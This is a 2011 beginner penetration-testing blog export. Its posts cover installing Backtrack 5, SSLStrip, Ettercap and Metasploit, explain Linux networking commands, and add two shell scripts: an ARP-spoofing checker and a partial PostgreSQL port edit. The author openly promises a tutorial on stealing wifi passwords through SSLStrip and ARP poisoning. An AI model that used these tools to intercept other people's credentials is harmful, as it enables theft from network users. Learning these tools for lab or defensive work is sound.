<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-I4MVUDj0Gj0/Tgq2PNGYTWI/AAAAAAAAABc/ULHkf2WinmE/s1600/5+-+backtrack+gnome+look.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://2.bp.blogspot.com/-I4MVUDj0Gj0/Tgq2PNGYTWI/AAAAAAAAABc/ULHkf2WinmE/s400/5+-+backtrack+gnome+look.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">GNOME Backtrack 5 GUI</td></tr>
</tbody></table>
<br />
<ul style="text-align: left;">
<ul style="text-align: left;">
<li>KDE --- check out the <a href="http://www.kde.org/">KDE site</a> for an in-depth view of what this flavor is like, but again, here's a screenshot of the KDE look on Backtrack 5.</li>
</ul>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-aoc7iqtV2NY/Tgq3Z3lQavI/AAAAAAAAABg/JklXeJpT3ts/s1600/6+-+backtrack+kde+look.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="300" src="https://2.bp.blogspot.com/-aoc7iqtV2NY/Tgq3Z3lQavI/AAAAAAAAABg/JklXeJpT3ts/s400/6+-+backtrack+kde+look.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">KDE Backtrack 5 GUI</td></tr>
</tbody></table>
<ul style="text-align: left;">
<li>The "Architecture" depends on your CPU (32-bit or 64-bit processor) -- a safe bet is 32-bit, but if you know your CPU is 64-bit you can use that.</li>
<li>The "image" is the type of file you want to download. Download the "ISO" for now since we're going to be using that one. VM is for using as a virtual machine (check out my <a href="http://www.hackavision.com/2013/04/starting-pentesting-lab-how.html" target="_blank">Penetration Testing Lab Setup</a> for more on that)</li>
<li>The "download" is how you'll be downloading it. If you know how to torrent, you can do that, but otherwise just choose "direct" and it will download it off the Backtrack 5 server.</li>
</ul>
Click the download button, and above the selection screen another interface will appear and tell you it's loading. After a few seconds, it will ask you again if you wish to register. Go ahead or don't, it doesn't matter. After you click through that selection, the download should pop up. Go ahead and save it to your desktop.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFzKtwvOoGpVakKmYpo-cIJOKWg0lKXalP3qvMisc1uxwsg33kjAcX6Qur1Ot41qHskpAwOAhDpjNYgsPraTDd0W49IiAh7ZBq4cyuTnHF5zLDcB3jQ_Kk6JFzcfowdg9jSGr_wZ5r9Y/s1600/7+-+backtrack+download.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipFzKtwvOoGpVakKmYpo-cIJOKWg0lKXalP3qvMisc1uxwsg33kjAcX6Qur1Ot41qHskpAwOAhDpjNYgsPraTDd0W49IiAh7ZBq4cyuTnHF5zLDcB3jQ_Kk6JFzcfowdg9jSGr_wZ5r9Y/s400/7+-+backtrack+download.JPG" width="500" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Sorry the picture is fuzzy, click on it for an enlarged version.</td></tr>
</tbody></table>
Now we need to download the program to put this ISO on our formatted pendrive. It's called "UNetbootin" and can be downloaded for Windows <a href="http://unetbootin.sourceforge.net/unetbootin-windows-latest.exe">here</a>, Mac OS <a href="http://unetbootin.sourceforge.net/unetbootin-mac-latest.zip">here</a>, and if you're reinstalling from Linux, grab the Linux one <a href="http://unetbootin.sourceforge.net/unetbootin-linux-latest">here</a>.<br />
Once it's done downloading from Sourceforge, just run the program (it requires no installation) and you will be confronted with an options page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYP_UlDPHGaOeVEEFV4rvSRiSg1Cvo47-e0qxIZLZcTL_z2oafkd5KKGyF1kvjqSCrOsRBk_FF3xc6nzWYLnMbFYmwT3PZIG5xUugUP_jUC1wQMTfAWMWwaRU1zvjDhkMrHenpaqTQPg/s1600/8+-+unetbootin.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxYP_UlDPHGaOeVEEFV4rvSRiSg1Cvo47-e0qxIZLZcTL_z2oafkd5KKGyF1kvjqSCrOsRBk_FF3xc6nzWYLnMbFYmwT3PZIG5xUugUP_jUC1wQMTfAWMWwaRU1zvjDhkMrHenpaqTQPg/s400/8+-+unetbootin.JPG" width="400" /></a></div>
Go ahead and ignore the top selections and click the hollow circle next to "Diskimage," then click the "..." button to the far right and navigate and select the ISO you just downloaded (it should be on your desktop like I instructed).<br />
Leave the "type" on USB Drive, or select that option if it is not already selected, and have the correct drive selected as well (you can view which drive it is in My Computer).<br />
Next, click "OK" and it should skip downloading files (we're using an ISO, so no downloading necessary), extract and copy, install the bootloader, then complete the installation (this may take some time... just be patient).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNE8UNaZoLulsCHBFE1w6fylAXgi5hHy13rD7QKPJNbs5vFgnLdxEACdYCm1eClFVkLBICW9tXkeDk4msHyUmBJ-XlMElK4DWa275sF3qGnDUxancQ1E8NUxN8V9syFSBGMoMvfCFkJA/s1600/9+-+unetbootin+install.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxNE8UNaZoLulsCHBFE1w6fylAXgi5hHy13rD7QKPJNbs5vFgnLdxEACdYCm1eClFVkLBICW9tXkeDk4msHyUmBJ-XlMElK4DWa275sF3qGnDUxancQ1E8NUxN8V9syFSBGMoMvfCFkJA/s400/9+-+unetbootin+install.JPG" width="400" /></a></div>
After it installs it will give you the option to restart or cancel. If you want to install BT5 on your current computer right now, just click the restart to begin, or click cancel and plug in your USB stick to the computer you want to install it to and restart or turn on that computer.<br />
<br />
When your computer is starting up, mash the key to enter boot options (mine is F10, most are F12 as far as I know) and a boot option loadup should appear. Select the top most Backtrack option (should say something like text mode; also available are forensics mode, memtest mode, and others, but don't worry about those).<br />
<br />
The Backtrack 5 background should appear with no icons or anything; push the F8 key and it will continue.<br />
<br />
Your computer should then load up in a black screen with white text cascading down (this is Backtrack loading off your USB) and you should be confronted with a command prompt line. If it asks for a login, the default is "root" and password "toor" but for now it shouldn't.<br />
Type in "startx" to load the Backtrack GUI (graphical user interface) with one icon in the top left that says "Install Backtrack" with the Backtrack icon. Double click this.<br />
<br />
This is the installation of Backtrack 5 onto your computer so you can run it off the HDD (hard disk drive) and not the USB stick. Go through each setup configuration (time zone, language, and keyboard setup) until you reach a prompt like the one below (not my prompt; mine is Windows XP, but I couldn't get a screenshot of mine).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRrPvtqg7YAstAVmPBzdU1hg7Su-M3VFqb9jGR6TUUMcC2KszHbl_iSETW2M4KrDPzXEq_hv8bPm0tYBazu9ni0q_PD-upF3hC8aTRFHpzMKTLCjcj3GcLa1aNlZ8vxhGW9jOzQG16-s/s400/Bt5_hdd_install08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRrPvtqg7YAstAVmPBzdU1hg7Su-M3VFqb9jGR6TUUMcC2KszHbl_iSETW2M4KrDPzXEq_hv8bPm0tYBazu9ni0q_PD-upF3hC8aTRFHpzMKTLCjcj3GcLa1aNlZ8vxhGW9jOzQG16-s/s400/Bt5_hdd_install08.png" width="400" /></a> </div>
If you want to dual-boot, make sure the top selection "install them side by side" is selected, if you select a different one <b>it will ERASE YOUR HARD DRIVE AND START FROM SCRATCH.</b><br />
<br />
If you want to solo-boot Backtrack, select the second option "erase and use entire disk" and select the correct HDD.<br />
<br />
If you're dual-booting it should tell you it's creating a new partition (space for the new operating system) and might take a while to do so, just wait for this to finish.<br />
<br />
Once this is done a "ready to install" page will show. Click on the "advanced" tab in the bottom right and make sure "install boot loader" is checked.<br />
Mine is "/dev/sda/" whereas my XP is "/dev/sda1/" so make sure they aren't the same or your computer is going to be quite messed up.<br />
<br />
After that is done, click "install" and it will begin. The installation pauses on 99% for quite some time, so don't worry (most of the installation happens while the bar sits at 99%, which rather defeats the point of a progress bar).<br />
After it's installed, click the "restart now" button that pops up, or if you don't want to for some reason click the "continue testing" button.<br />
<br />
If you're dual-booting, once you boot up your system it should ask which operating system you want to use, select Backtrack 5 and push F8 again when the background shows up (don't panic because you can't do anything, your computer hasn't frozen, this is how BT loads) and wait for the black loadup screen to come up with cascading text.<br />
<br />
The default login is again "root" as the username and "toor" (root backwards) as the password.<br />
Change your password by typing "passwd [new password]" and it will update your password to whatever you want. Do this now for extra security.<br />
Next, on the next screen type "startx" to load up the Backtrack GUI so we can actually use our penetration suites.<br />
<br />
Let's do our first terminal usage with Backtrack to upgrade and update the already installed suites (collections of programs).<br />
<br />
Open a terminal (the black box with a ">_" in it on the top or bottom bar depending on whether you downloaded Gnome or KDE) and type "apt-get upgrade"<br />
<br />
For me everything is upgraded and it should tell you that. Next, type "apt-get update" and it will update all your packages installed. Mine only updated 3,473 kbs, but some others may not be updated for some reason. Run these frequently to get the most updated versions of all your programs! I run it once every few days.<br />
<br />
That's it. You should have Backtrack 5 working on your computer or laptop and should be able to dual-boot if you want that. Post below any issues and I'll respond!<br />
</div>
</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-43626327114207942362011-06-28T20:44:00.001-04:002022-12-20T10:46:27.745-05:00[OLD] Installing SSLStrip [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
I've written most of a how-to and explanation of how to use two programs, SSLStrip and Ettercap, to sniff networks and grab passwords even if a secure connection is used (HTTPS rather than HTTP), but I have to cover a few topics before I release it.<br />
First, I need to explain how to install SSLStrip for those people not using Backtrack 5, then I must explain ARP (Address Resolution Protocol) poisoning and spoofing, since this is an important part of using SSLStrip and Ettercap to grab passwords.<br />
<br />
If you're using Backtrack 5, like I mentioned before SSLStrip should be installed already and located in the "/pentest/web/sslstrip" folder and can be run by typing "python sslstrip.py"<br />
For the users not using Backtrack 5, follow the directions below:<br />
<br />
<a name='more'></a><br />
<ul style="text-align: left;">
<li>First, we need to install the dependencies required for SSLStrip. These include Python and a "twisted-web" Python module. Install these by using the apt-get command we've previously learned; type "apt-get install python" (use sudo [super user do] if you're not root or su) and then "apt-get install python-twisted-web"<br />
Once these dependencies are installed correctly by our apt-get, we can move on.<br />
</li>
<li>Next, download the SSLStrip tar file. We've done this with Aircrack and Ettercap, so you might have a slight idea what the next steps are, and if you do, try doing it yourself first to see if you can!<br />
The file is located <a href="http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz">here</a>. Save to your desktop or home or any folder you can remember and navigate to.<br />
<i><b>Make sure you navigate to this folder before issuing the commands below!</b></i></li>
<li>Of course now we're going to extract the tar file with the command "tar -zxvf sslstrip-0.9.tar.gz" and then move into the newly created directory with "cd sslstrip-0.9"<br />
You should now be in that folder, check this by typing "pwd"<br />
</li>
<li>Next, type "python ./setup.py install" and it should install without any errors. Again, if you're not root or a superuser, use the "sudo" command before the above command.</li>
</ul>
Again, this install was quite easy, but hopefully you understand how to extract and install the tar and tar.gz files that are used in Linux every day!<br />
I'll be posting an informative post tomorrow or the next day (I've been busy starting a new job) about ARP and why it's important to understand, then I will post a really fun tutorial about how to steal passwords over wifis using SSLStrip and Ettercap!<br />
<br /></div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-26716271157683299162011-06-27T14:05:00.045-04:002011-06-29T13:36:35.704-04:00Beginning networking in Ubuntu [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">I'm trying to cover all the basics first so new users can jump right into later topics just by reading these and the other posts I've released, and *hopefully* gain an understanding of the most basic Linux commands and functions.<br />
<br />
For each command listed below I will attempt to describe the basis for its name, what its acronym stands for (if necessary), its basic uses, a few more advanced uses, and any other information I (or any commentators!) see as useful.<br />
<br />
<a name='more'></a><br />
<ul><li>ifconfig --- Stands for "interface configuration," and is used to configure your network interfaces. While I post how-tos, I will often type [interface] which means that you should enter whichever network interface, without brackets, you want to use the command with.</li>
<ul><li>Typing "ifconfig --help" brings up a help list of options you can use with your ifconfig command. I'll review and go over some useful ones here, but try checking out a bunch of them yourself since each person has their own uses and needs.</li>
<li>Pull up a terminal and type the "ifconfig" command and review what appears. For me, the interfaces "eth0," "lo," "wlan0," and "wlan0mon" come up. eth0 is my ethernet interface, wlan0 is my wireless interface, and wlan0mon is my wireless monitoring interface.<br />
Let's disable and enable some interfaces. My monitoring interface (meaning an interface that is being used to monitor networks, used when packet sniffing as seen in the aircrack-ng tutorial) isn't being used by me right now, so let's enable this one for you, then disable it to see how these commands work.<br />
Type "ifconfig wlan0mon up" --- it shouldn't echo back anything on the screen, but if you type "ifconfig" to review your interfaces, "wlan0mon" should be included in there! For me, it's in "promiscuous mode" which I will review later.<br />
Now let's disable it. Type "ifconfig wlan0mon down" and then type your "ifconfig" command again. It should be gone!</li>
</ul><li>iwconfig --- like our ifconfig, but dealing with wireless interfaces. This command has a number of different options, which I will cover below.</li>
<ul><li>Type in the "iwconfig" command and look at the results. They're like the ifconfig results. Type in "iwconfig --help" and look at all the additional options you can type.</li>
<li>First, the "ESSID" stands for the "Extended Service Set Identification (ID)" and is the alphanumeric name we give our computers to discern them from others on the network.</li>
<ul><li>You can set the ESSID to anything, just type "iwconfig [interface] [essid]"</li>
</ul><li>Next, the "mode" can be set to managed, ad-hoc, master, repeater, secondary, or monitor. The descriptions below are taken from the "man iwconfig" page.</li>
<ul><li>Managed --- "node (computer) connects to a network composed of many Access Points, with roaming"</li>
<li>Ad-hoc --- "network composed of only one cell and without Access Points"</li>
<li>Master --- "the node (computer) forward packets between other wireless nodes"</li>
<li>Secondary --- "the node (computer) acts as a backup master/repeater"</li>
<li>Monitor --- "the node (computer) is not associated with any cell and passively monitors all packets on the frequency"</li>
<li>Auto --- Automatic; self explanatory.</li>
<li>Examples: "iwconfig wlan0 mode monitor" or "iwconfig mon0 mode managed"<br />
If you have followed the installing Aircrack-ng tutorial and used the WEP/WPA cracking tutorial, you should be familiar with the "airmon-ng start [interface]" and "airmon-ng stop [interface]" commands; these change the interface from its current state to "monitor" mode, and from monitor mode back to "managed" mode. You can test these commands alongside the iwconfig commands and see which one you like better.</li>
</ul><li>Frequency --- this you shouldn't be too worried about; most interfaces work on the 2.46GHz frequency.</li>
<li>Channel --- In North America, the channel will be between 1-11 (in other countries and continents they go higher, but for now let's just worry about North America). As you work with networks and sniffing them, you will realize some networks tend to sit on the same channels (1, 6, and 11, for example); to change your interface to a different channel, type "iwconfig [interface] channel [channel #]", e.g. "iwconfig wlan0 channel 6" would switch my interface wlan0 to channel 6 to listen.<br />
<br />
You shouldn't have to use more than these commands at first, but if necessary, type "iwconfig --help" or "man iwconfig" to review the additional commands.</li>
</ul><li>ping [options] --- I first reviewed the ping command in my <a href="http://hackavision.blogspot.com/2011/06/quick-overview-of-linux-commands-linux.html">quick overview of Linux commands</a>, but I'll try to explain more in depth here why ping is one of the most important networking tools in Linux (and Windows!), and some descriptive uses of it.<br />
A quick explanation of how ping works is that a packet called an "ECHO_REQUEST" packet is sent to the target, and if it is received, an "ECHO_REPLY" packet is sent back to the host that is issuing the ping command. If a reply packet is not received back, that tells the computer that the request packet was never received. This is called "packet loss" which you have probably seen before.<br />
<br />
The basic form of using the ping command is: <br />
<blockquote>ping &lt;ip-address or hostname&gt;</blockquote>Try using this on your "localhost" which is the ip address "127.0.0.1"<br />
Pull up a new terminal and type in "ping 127.0.0.1" and review the output. Push Ctrl-z when you want it to stop pinging (ctrl-z is the EOF [end of file] command which stops most Linux operations).<br />
Let's go over some of ping's options:</li>
<ul><li>-c [#] --- the "count" option. The ping command will stop after the system has pinged the number of times the user has specified; e.g. "ping -c 3 localhost" will ping 3 times, then stop. This is very useful when you only want a specific number of pings (say just 5) rather than an endless spam of them.<br />
Try this by typing the above command "ping -c 3 localhost" and review the outcome.</li>
<ul><li><b>ON WINDOWS, THE COUNT COMMAND IS "-n" INSTEAD OF "-c"</b><br />
</li>
</ul><li>-f --- the "flood ping" option. Taken from the manual page, it is described as<blockquote>"For every ECHO_REQUEST sent, a period is printed, while for ever [sic] ECHO_REPLY received a backspace is printed. This provides a rapid display of how many packets are being dropped."</blockquote>This option adds a visual aid to pinging. The gist of what the manual page says is that for every request sent, a period is printed, and for every reply received, one is deleted.<br />
So say you ping five times, and five are sent, and five are received, then no periods would appear on screen since there would be five periods and five backspaces, nullifying these periods. For every period that appears, a packet is dropped.<br />
If you pinged five times, five packets are sent, but only three are received, then two periods would appear, meaning two packets were dropped.<br />
In layman's terms, each period that appears is a dropped packet.<br />
</li>
<li>-i [#] --- the "interval" option. With this option, the ping command waits the specified amount of seconds in between each ping; the default is one second in between pings if this option is not used or specified.<br />
In the manual, it states that "only super-users may set interval to values less than 0.2 seconds" meaning that you have to be root or use the command "sudo" (super user do) before the ping command if you wish to have a quicker interval than one every 0.2 seconds.</li>
<li>-n --- the "numeric output only" option. When this option is used, if you ping a hostname (such as "www.google.com" or "localhost") it only uses the IP address in the output, and does not print the hostname.<br />
Compare these commands: "ping -c 5 localhost" and "ping -c 5 -n localhost"<br />
You see how "bytes received from *hostname* (*IP address*)" is changed to "bytes received from *IP address*"? That's what this option does.</li>
<li>-q --- the "quiet mode" option. If you use this option, it does not output each "bytes received" line while running the command, but instead just outputs the summary lines at the beginning and end.<br />
Try running the command "ping -c 5 -q localhost" and view the output. You should see the "PING localhost (127.0.0.1) xxx bytes of data" and then the statistics of the ping.<br />
This command is useful if you don't care about each output and just want to see the overall summary.</li>
<li>-t [#] --- the TTL (time to live) option. Use this option to set the "time to live," which is the number of "hops," or transfers between routers, that the ping packet will make before being dropped. After each "hop" (transfer) the TTL number is reduced by one (n-1), until it reaches 0 and the packet is then discarded.<br />
The maximum number this can be is 255.</li>
</ul><li>arp [options] --- The "arp" command displays the Address Resolution Protocol table, which is a list of computers that you have exchanged information with. You can manipulate the ARP cache with this command (which we will be doing eventually).<br />
Try issuing this command on your Linux machine with the simple command "arp" and review the output. A list of nodes (computers and routers) on your network should appear.<br />
The "address" is of course the IP of the computer or router.<br />
The "HWtype" is the type of connection (ethernet or wireless).<br />
The "HWaddress" is the MAC (media access control) address, also called the "physical" address (you will often hear it referred to that way, because this address is assigned to the card when it is manufactured).<br />
Below are some arp options you can use:</li>
<ul><li> -a --- This option is to use the alternative "BSD" style output format and doesn't use tabs to space things.<br />
Compare the commands "arp" and "arp -a" and review how they look different.</li>
<li>-d --- This option (it's actually considered a "mode") deletes an ARP table entry (the manual says "a ARP" which is funny to me; correct grammar isn't the programmers' highest priority).<br />
This command requires root privileges to run (they also spelled privilege "priveledge").</li>
<li>I will add more of these later. There aren't many more, but I will update it so we can understand all the options of arp.</li>
</ul></ul>I just got back from my vacation and wrote this up, I'll add MANY more tomorrow and in the following weeks, so come back to this post frequently to check it out. As always, post below any changes I need to make... I'm sure I messed something up!<br />
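As an added example that is not part of the original post, here is a short shell script that reads an arp table (constructed below for the demo) and runs two defensive checks on it: a hardware address that shows up under more than one IP, and a gateway entry whose MAC no longer matches one you recorded when the network was known-good. The function names and sample addresses are mine.<br />

```shell
#!/bin/sh
# Added example, not from the original post: two checks over the ARP table.
# The listing below is constructed for the demo in the column layout the post
# describes (Address, HWtype, HWaddress, Flags, Mask, Iface); on a real
# machine you would pipe in the output of `arp -n` instead.
SAMPLE_ARP='Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     wlan0
192.168.1.10             ether   aa:bb:cc:dd:ee:01   C                     wlan0
192.168.1.20             ether   00:11:22:33:44:55   C                     wlan0
192.168.1.30             ether   aa:bb:cc:dd:ee:03   C                     eth0
192.168.1.40                     (incomplete)                              wlan0'

# find_duplicate_macs: read an arp table on stdin and print every hardware
# address that is mapped to more than one IP, followed by those IPs.
# Two IPs sharing one MAC is one of the classic signs of a tampered cache
# (it can also be a legitimate multi-homed host, so treat it as a lead).
find_duplicate_macs() {
    awk 'NR > 1 && NF >= 3 && $2 != "(incomplete)" {
             count[$3]++
             ips[$3] = ips[$3] " " $1
         }
         END {
             for (mac in count)
                 if (count[mac] > 1)
                     print mac ips[mac]
         }'
}

# check_gateway_mac IP EXPECTED_MAC: read the table on stdin and compare the
# entry for IP against a MAC you recorded when the network was known-good.
# Exit status: 0 match, 1 mismatch, 2 no (complete) entry for that IP.
check_gateway_mac() {
    ip=$1
    expected=$2
    actual=$(awk -v ip="$ip" '$1 == ip && $2 != "(incomplete)" { print $3; exit }')
    if [ -z "$actual" ]; then
        echo "$ip: no complete ARP entry"
        return 2
    elif [ "$actual" = "$expected" ]; then
        echo "$ip: $actual (matches recorded MAC)"
        return 0
    else
        echo "$ip: $actual (expected $expected)"
        return 1
    fi
}

# Demo run over the constructed table.
echo "Hardware addresses seen under more than one IP:"
printf '%s\n' "$SAMPLE_ARP" | find_duplicate_macs
printf '%s\n' "$SAMPLE_ARP" | check_gateway_mac 192.168.1.1 00:11:22:33:44:55
```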
<br />
[Last edited June 29th, 1:30PM]<br />
</div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-26088534015164110002011-06-26T16:53:00.002-04:002022-12-20T10:46:29.005-05:00[OLD] Installing Ettercap [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
Right now I'm working on a password-sniffing Ettercap guide, but I require my home Desktop to finish it (with screenshots and better scripts), and me being on vacation in Florida right now impedes me from doing that. I'll be home tomorrow night, and should be working hard on it so look for something relating to this then!<br />
<br />
For now, here's a guide on installing the program I'll be using: Ettercap. Backtrack5 should come automatically installed with it, but for those dual-booting and using general Linux flavors, here's a guide for you!<br />
<a name='more'></a><br />
<ul>
<li>First, download the Ettercap "tar" file that we are going to extract and install, the newest (0.7.3) version located <a href="http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download">here</a>. If you want to take a look at all versions available (they may become updated and I might not update this post in time), take a look <a href="http://ettercap.sourceforge.net/download.php">here</a>.</li>
<li>Once you've downloaded the file to either your root, home, or desktop (as we did while installing Aircrack-ng), you need to issue the command in a new terminal to unpackage the tar file.<br />
Open a terminal and type "tar -xvf [file name]" to unpackage it. What the "xvf" means is explained in the Aircrack-ng installation guide, but I'll list it here as well.<br />
x --- extract<br />
v --- verbose<br />
f --- file [file] (necessary to determine the file).</li>
<li>Once you've unpackaged the tar file, navigate into the folder that was just created, usually named after the file we downloaded/extracted (in this case "ettercap-NG-0.7.3"), but type "ls" into your terminal to check what it is called, then "cd" command into that folder.<br />
I typed: "cd ettercap-NG-0.7.3"</li>
<li>Next, while in the folder you extracted, type the command "make" and then once that command is done, "make install" which should install the program and make it usable by you.</li>
</ul>
As you can probably tell by these two installations, most are pretty easy! Just remember that tar files are pretty much zip files on Windows systems (I imagine most of you know Windows well), and using the "tar" command on the file is extracting it to a folder (as you've seen on Windows/Mac systems). The "cd" command is probably the most useful command in the *nix arsenal, and moves you from folder to folder where you can use the "make" and "make install" commands to install programs!<br />
<br />
As always, post stuff below. I realize this is simple, but for newbies of Linux it's not, so please understand this before posting. Any comments are welcomed though; pointers and help always appreciated (the Reddit community has helped in major ways so far. I don't take criticism as you tearing me down, this is a blog for newbies; we're all learning!).</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-81357495383586025532011-06-25T18:37:00.017-04:002022-12-20T10:46:30.117-05:00[OLD] Installing Metasploit [Linux/Now Updated with Windows!]<div dir="ltr" style="text-align: left;" trbidi="on">
Now that I've briefly covered some WEP/WPA cracking, let's install an important tool to our arsenal for issuing exploits and "payloads" (a name for exploits).<br />
<br />
This program is called "Metasploit" and is considered by many to be one of the most important hacking/pentesting tools around. It has an amazing array of exploits that can be used on many vulnerable machines, and when coupled with the vulnerability scanner Nessus (I'll cover this in the future) becomes a highly sophisticated tool we can use to hack into and secure our networks.<br />
<br />
I'm installing this on Ubuntu Gnome Backtrack 5 (the newest release), so if you're on a different GUI (like KDE) and aren't using BT5, some things might be different.<br />
<br />
NOTE: It may be useful for new users to check out my <a href="http://hackavision.blogspot.com/2011/06/quick-overview-of-linux-commands-linux.html">Linux commands overview</a> that I recently updated (the day this post was released).<br />
<br />
Hopefully you know the basics of Linux navigation and listing commands, so let's begin.<br />
<a name='more'></a>For those running Linux 32 bit like me, download <a href="http://updates.metasploit.com/data/releases/framework-3.7.2-linux-full.run">this</a> and save it to your computer. For 64 bit, download <a href="http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run">this</a> and save it to your computer. <br />
These are both the full installations because I'm assuming you, like me, do not have the dependencies already installed (which are NOT optional).<br />
<br />
Once you have them downloaded (they may take a while), open a new terminal console and enter the command to navigate to the directory that it is saved on. If you saved it to your desktop like me, all I type is "cd Desktop" (capitalization is necessary; Linux is case-sensitive; a doesn't mean A) and can confirm this with a "pwd" command. If you saved it in your Home directory (where the cd command alone takes you), try issuing an "ls" command to make sure it's there.<br />
<br />
Once you're in the correct directory, type "chmod +x framework-3.*-linux-full.run" which runs the "chmod" command with the option "+x" on your downloaded file. This changes the permissions of this file to add "executable" so we can run it.<br />
Next, we need to run this executable! Type: "./framework-3.*-linux-full.run" and it should bring up the install GUI (graphical user interface) in a few seconds (or minutes if your computer is slower like mine). <br />
<br />
<ul>
<li>The first screen will be a welcome screen, just click "forward" and move on.</li>
</ul>
<ul>
<li>The next screen is Metasploit's license agreement. Read it if you want then click "I accept the agreement" and then "forward."</li>
</ul>
<ul>
<li>The next is where you want the Metasploit framework installed; I would keep it default (my default is /opt/framework-3.7.2). Click forward to continue. </li>
<ul>
<li>If, after you push forward, it says the directory cannot be created because it is full or already exists, try renaming the installation path or check whether Metasploit is already installed. If it isn't, you can rename your old folder by adding ".bak" to make sure you don't screw anything up.</li>
<ul>
<li>To rename it using Gnome 32bit, click on "Places" then "Computer" then "root," then click on "go" in the taskbar and click "open parent" <b>OR</b> while in "Computer" hit "alt-up." <b>An easier way to do this may just be to click on "File system" but sometimes that just doesn't work or isn't located on the options.</b></li>
<li>Next, double click the "opt" folder. There should be a bunch of folders in here, one being the folder you're trying to install. Right click that folder and click "rename" and add ".bak" to the end of the file name. You should be all ready to install it now if you wish.</li>
</ul>
</ul>
</ul>
<ul>
<li>The next screen prompts for automatic updates. I highly suggest leaving this on "yes" so you always have up-to-date exploits on your hands. Click forward.</li>
<li>The "Ready to install" page should come up; click forward to start your installation! If you're stupid like me and hit "cancel" at any point, it will prompt before closing, so don't worry about hitting the key!</li>
<li>After you hit forward, it should start installing and have a task completion bar. Depending on your computer it may take a while to install.</li>
<ul>
<li>If you encounter an issue where it states that port 7175 is not open and it is closing the installation because of this, you have to change the Postgresql .conf (configuration) file to start on port 7175 instead of the default 5xxx something. To do this, we are going to edit this file with our (meaning my) favorite Linux text editor, Nano.<br />
Open a new terminal and navigate to your "/" folder. This may be your home on some computers, but my "home" is "/root," so I have to use the "cd" command to get there.<br />
How I navigate there is by typing "cd ../" which places me from my "/root" folder to my "/" folder (the ../ means go UP (back) a level).<br />
Next, I use my trusty "cd" command and type "cd etc" which brings me to "/etc" (if you type "pwd" it will show your location).</li>
<li> Then navigate into the "postgresql" folder with your cd command and further into the "8.4" and the "main" folder within that (your location should be "/etc/postgresql/8.4/main"). If your number isn't 8.4, use whatever version you have installed (as far as I know, 9.04 is out, but I haven't updated to it).<br />
Next, we're gonna edit the "postgresql.conf" file with our nano text editor. Type "nano postgresql.conf" while in the directory stated above and a text editor format will come up that you should be generally familiar with since it looks like most others. You can read all the comments (lines with "#" in them), or you can scroll down past the "File locations" to the "connection and authentication" section. From there, you should see a setting "port= 5432" or something of the sort. Edit that number to 7175 (or if your error gave you a different port, set it to that), then push control o (the "oh" key), then push enter to write the file (a small prompt will come up asking to write it, pushing enter confirms this). Then push control-z to exit the editor.<br />
A restart of your system is required after this fix, so restart and hopefully your postgresql will start on the correct port. Redo your installation (delete your old framework-3xxx folder) and do everything normal. If this doesn't work, post a comment below and I'll help you troubleshoot.</li>
</ul>
<li>Whoo, well, hopefully you didn't have that postgresql issue and it all installed fine, but if you did, read the block of text above and then come to this point. Once you have a successful install, you can try to update with the command "msfupdate" and run the program as "msfconsole."<br />
If you have any problems, ask below in a comment, email me, or @tweet me at my <a href="http://twitter.com/mjhallenbeck">twitter</a> account.<br />
You can navigate to the MSF3 files in the /opt/framework-3.7.2/msf3 directory and check out all the files listed there. There is a README file that may help you troubleshoot and figure out this amazing exploit program.</li>
</ul>
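As an added example (not from the original post), here is a small shell script that makes the postgresql.conf port change described in the troubleshooting step above with sed instead of by hand in nano, keeping a .bak copy and confirming the new value. The config excerpt it edits is constructed for the demo and written to a temporary file; the function names are mine.<br />

```shell
#!/bin/sh
# Added example, not from the original post: change the active `port =`
# setting in a postgresql.conf-style file, keeping a backup and verifying
# the result. The post's real file was /etc/postgresql/8.4/main/postgresql.conf
# and the port the Metasploit installer wanted was 7175; the excerpt below is
# constructed for the demo and lives in a temporary file.

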